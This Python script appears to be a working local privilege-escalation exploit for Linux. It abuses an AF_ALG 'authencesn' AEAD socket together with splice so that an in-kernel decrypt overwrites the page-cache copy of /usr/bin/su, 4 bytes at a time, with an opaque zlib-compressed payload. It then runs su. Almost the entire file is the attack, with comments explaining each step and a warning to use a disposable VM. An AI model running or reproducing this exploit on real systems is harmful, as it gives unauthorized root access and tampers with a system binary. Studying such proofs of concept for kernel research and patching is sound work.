import os, zlib, socket
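def exploit(payload: bytes, su_file: int, counter: int) -> None:
    """Push one 4-byte chunk of ``payload`` at offset ``counter`` of ``su_file``.

    Mechanism as visible here: an AF_ALG AEAD socket for
    ``authencesn(hmac(sha256),cbc(aes))`` is keyed with an all-zero key and a
    4-byte tag; ``b"AAAA" + payload`` is sent as the 8 bytes of associated
    data; ``counter + 4`` bytes of ``su_file`` (from offset 0) are then
    spliced through a pipe into the socket as the ciphertext, and ``recv()``
    triggers the decrypt. That ``recv()`` is expected to fail (the tag cannot
    verify) and its error is suppressed -- the script relies on the in-kernel
    decrypt having already modified the spliced page-cache pages in place
    before the failure is reported. Exactly how ``payload`` ends up at file
    offset ``counter`` is kernel behaviour this file does not show; treat it
    as a PoC for a specific unpatched kernel, not a general primitive.

    Args:
        payload: at most 4 bytes to land at file offset ``counter``.
        su_file: open, readable file descriptor of the target file.
        counter: target byte offset; the caller steps it in multiples of 4.

    Raises:
        OSError: if socket setup, sendmsg or splice fails.
        RuntimeError: if a splice moved fewer bytes than requested (the
            ciphertext length would then no longer match ``counter``).
    """
    chunk_len = counter + 4
    listener = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
    try:
        listener.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
        # authenc key blob: rtattr header (len 8, type 1 = key params),
        # enckeylen = 16 big-endian, then what appears to be a 16-byte HMAC
        # key followed by a 16-byte AES key, all zero. The key value is
        # irrelevant to the effect; only the layout has to parse.
        listener.setsockopt(
            socket.SOL_ALG,
            socket.ALG_SET_KEY,
            bytes.fromhex("0800010000000010" + "0" * 64),
        )
        # 4-byte authentication tag (optval NULL, optlen 4).
        listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE, None, 4)

        connection, _ = listener.accept()
        try:
            # Decrypt request header: op = decrypt (0), 16-byte zero IV,
            # assoclen = 8 covering b"AAAA" + payload. MSG_MORE keeps the
            # request open for the spliced ciphertext that follows.
            connection.sendmsg(
                [b"A" * 4 + payload],
                [
                    (socket.SOL_ALG, socket.ALG_SET_OP, b"\x00" * 4),
                    (socket.SOL_ALG, socket.ALG_SET_IV, b"\x10" + b"\x00" * 19),
                    (socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, b"\x08" + b"\x00" * 3),
                ],
                socket.MSG_MORE,
            )

            # File -> pipe -> socket so the socket receives the file's own
            # page-cache pages rather than a copy. Both splices must move the
            # full length or the ciphertext no longer lines up with `counter`.
            pipe_r, pipe_w = os.pipe()
            try:
                moved = os.splice(su_file, pipe_w, chunk_len, offset_src=0)
                if moved != chunk_len:
                    raise RuntimeError(f"short splice from file: {moved} != {chunk_len}")
                moved = os.splice(pipe_r, connection.fileno(), chunk_len)
                if moved != chunk_len:
                    raise RuntimeError(f"short splice into socket: {moved} != {chunk_len}")
            finally:
                os.close(pipe_r)
                os.close(pipe_w)

            # Output size = assoclen (8) + ciphertext (counter + 4) - tag (4).
            # The tag check is expected to fail; the side effect we want has
            # (presumably) happened by then, so the error is deliberately
            # ignored. Narrowed from a bare except so real bugs still surface.
            try:
                connection.recv(8 + counter)
            except OSError:
                pass
        finally:
            connection.close()
    finally:
        listener.close()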
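if __name__ == "__main__":
    # Local privilege-escalation PoC: it modifies /usr/bin/su (at least in the
    # page cache) 4 bytes at a time via exploit() and then runs `su`. Only
    # run on a disposable test VM, and it is only effective on a kernel still
    # affected by the crypto/splice bug exploit() relies on (not identified
    # in this file).

    # What the decompressed bytes are (presumably a small ELF/stub that
    # replaces the start of su) is not visible here.
    payload = zlib.decompress(
        bytes.fromhex(
            "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
        )
    )

    # Read-only descriptor on purpose: no write permission on su is needed;
    # the modification comes from the kernel-side decrypt in exploit().
    su_file = os.open("/usr/bin/su", os.O_RDONLY)
    try:
        # 4-byte steps match the 4-byte tag / "AAAA" prefix in exploit().
        # NOTE(review): a trailing chunk shorter than 4 bytes would not match
        # the assoclen of 8 declared in exploit(); the payload length is
        # presumably a multiple of 4 -- verify before changing it.
        for offset in range(0, len(payload), 4):
            exploit(payload[offset : offset + 4], su_file, offset)
    finally:
        os.close(su_file)

    os.system("su")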